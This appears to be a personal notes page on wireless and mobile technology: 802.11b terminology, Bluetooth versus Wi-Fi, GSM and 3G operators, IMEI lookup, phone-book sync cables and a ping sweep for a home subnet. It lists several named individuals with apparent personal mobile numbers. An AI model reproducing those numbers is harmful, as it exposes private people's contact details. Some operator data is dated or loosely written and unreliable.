Appendix: 802.11b demystified

BSS = Basic Service Set
A cell of stations which may or may not have an access point. A "coordination function" acts as collision detection.

IBSS = Independent Basic Service Set
A self-contained BSS with no access point, one of the members can assume the "coordination function". This is the 802.11 peer-to-peer mode of operation also known as Ad-Hoc mode. Only one wireless "cell" is supported for each different SSID. All communication is done from Client to Client without the use of an Access Point. Clients use the same SSID for establishing the wireless connection.

SSID = Service Set Identifier
A 32 octet-long network name; exactly one per ESS or IBSS.

Infrastructure mode = Managed mode
This mode of operation requires the presence of an 802.11 Access Point. All communication is done via the Access Point which relays packets to other wireless Clients in the BSS as well as to nodes on a wired network such as Ethernet.

ESS = Extended Service Set
A set of one or more interconnected BSSes. All traffic flows through an access point.

BSSID = Basic Service Set Identifier
6 octet cell identifier for a BSS. Value is the same as access point MAC address. Used in iwconfig for the cell value.

Origin URL  

WiFi vs BlueTooth


wifi specs

2.462.000 KHz = 2.462 MHz = 2,462 GHz

wiki wifi

bluetooth specs

A Bluetooth device playing the role of the "master" can communicate with up to 7 devices playing the role of the "slave". This network of "group of up to 8 devices" (1 master + 7 slaves) is called a piconet.
Every device has a unique 48-bit address. Every device also has a 24-bit class identifier.

Air interface

The protocol operates in the license-free ISM band at 2.45 GHz. In order to avoid interfering with other protocols which use the 2.45 GHz band, the Bluetooth protocol divides the band into 79 channels (each 1 MHz wide) and changes channels up to 1600 times per second. Implementations with versions 1.1 and 1.2 reach speeds of 723.1 kbit/s. Version 2.0 implementations feature Bluetooth Enhanced Data Rate (EDR) , and thus reach 2.1 Mbit/s.
Technically version 2.0 devices have a higher power consumption, but the three times faster rate reduces the transmission times, effectively reducing consumption to half that of 1.x devices (assuming equal traffic load).


Bluetooth differs from Wi-Fi

The latter provides higher throughput and covers greater distances but requires more expensive hardware and higher power consumption. They use the same frequency range, but employ different multiplexing schemes. While Bluetooth is a cable replacement for a variety of applications, Wi-Fi is a cable replacement only for local area network access.

A glib summary is that Bluetooth is wireless USB, whereas Wi-Fi is wireless Ethernet, both operating at much lower bandwidth than the cable systems they are trying to replace.

How stuff works :
One of the ways Bluetooth devices avoid interfering with other systems is by sending out very weak signals of about 1 milliwatt ...
Bluetooth can connect up to eight devices simultaneously ...
Bluetooth uses a technique called spread-spectrum frequency hopping that makes it rare for more than one device to be transmitting on the same frequency at the same time. In this technique, a device will use 79 individual, randomly chosen frequencies within a designated range, changing from one to another on a regular basis. In the case of Bluetooth, the transmitters change frequencies 1,600 times every second, meaning that more devices can make full use of a limited slice of the radio spectrum. Since every Bluetooth transmitter uses spread-spectrum transmitting automatically, it's unlikely that two transmitters will be on the same frequency at the same time. This same technique minimizes the risk that portable phones or baby monitors will disrupt Bluetooth devices, since any interference on a particular frequency will last only a tiny fraction of a second.
When Bluetooth-capable devices come within range of one another, an electronic conversation takes place to determine whether they have data to share or whether one needs to control the other. The user doesn't have to press a button or give a command -- the electronic conversation happens automatically. Once the conversation has occurred, the devices -- whether they're part of a computer system or a stereo -- form a network. Bluetooth systems create a personal-area network (PAN), or piconet, that may fill a room or may encompass no more distance than that between the cell phone on a belt-clip and the headset on your head. Once a piconet is established, the members randomly hop frequencies in unison so they stay in touch with one another and avoid other piconets that may be operating in the same room.



  • Standards
    • GSM
      How does it work ? The frequency change when switching cells ? Roaming ?
      Teleco info, good intro.
      How is a top-up done ?
      • as CORTIX : a message arrives !
      • as usual : buy a card and enter the (large) code. Is anything sent before the balance is updated ?

      How can I check my balance over the Internet ?

    • GPRS [General Packet Radio Service]

    • UMTS [Universal Mobile Telecommunications System]  
      Third-generation mobile telephony.
      • Spain
        • Telefónica
        • Vodafone
        • Amena Auna - Oct 2004
        • Xfera
      • France
        • Orange (France Telecom)
        • SFR (Vivendi)
      • Germany
        • T-Mobile (Deutsche Telekom)
        • Vodafone
        • Mobil COm (France Telecom)
        • 3G (Telefonica/Sonera)
        • E-Plus (KPN)
      • Italy
        • Telecom Italia Mobile
        • Omnitel (Vodafone)
        • Wind (France Telecom)
        • Telefonica PSE
        • Andala
      • United Kingdom
        • Vodafone [CDM ???]
        • TIW
        • Orange
        • British Telecom
        • Onezone
    • HDSPA (Feb 2006)

  • USA (millions of customers)
    • Verizon Wireless : 36
    • Cingular : 23,4 [GSM] (1) merged on 18/Feb/2004
    • AT&T wireless : 21,9 [GSM] (1)
    • Sprint : 15,5
    • Nextel : 12,3
    • T-mobile : 12,1

  • Worldwide operators [9/3/2004]
    1. China Mobile
    2. Vodafone
    3. China Unicom
    4. TEM + BSLA : 62,5 million
    5. T-Mobile
    6. Orange
    7. NTT DoCoMo
    8. Cingular + AT&T Wireless

  • unlocking

  • IMEI : Enter *#06# on your phone's key pad and the 15 digit number will be displayed on the screen.

  • How it works : I go to CORTIX, they charge me some money, and they send an SMS saying I have more balance. Is the balance on the card or at the exchange ?

  • How do you transfer the phone book from the mobile to the PC and vice versa ?
    CF62 - easy : use Siemens Data Suite [18,7 MB]
    Cable :
    • connection to COM port : DCA-500
    • connection to USB port : DCA-510

    f:\miscosas\CF62 !


  • Ionna : 666.36.38.42 - Siemens C45.

  • Nico : 670.85.84.98 - Siemens C45.

    2nd : 66666.38.59 - Siemens SL-55

  • Arcadi : - Nokia 5140

  • CF62 - Siemens : 667.33.88.59

  • V3 - Motorola : 677.65.86.99



Configuring an Access Point as a wireless repeater

Read Link Sys


Differences :

See BT4 and wiki.

Security & WiFi & jargon
Wireless security type : Use 802.1x EAP Cisco (LEAP) + data encryption = TKIP.

802.1x, EAP.

Scan range for alive IPs
c:\> FOR /L %i IN (1,1,255) DO @echo 192.168.1.%i & @ping -n 2 192.168.1.%i -w 900 | find "Reply"

Wifi 802.11x speeds

IEEE Standard / Speed


Wifi networks order

If you have multiple wifi networks available, Windows will try to connect to them in the order specified by

  1. Control Panel
  2. Network and Internet
  3. Manage Wireless Networks

Right-click on any item and select "Move Up" or "Move Down" from the menu.

Wifi links

Hey ! Site under construction. Write to me !
Updated 20171117 (A)  
Uf !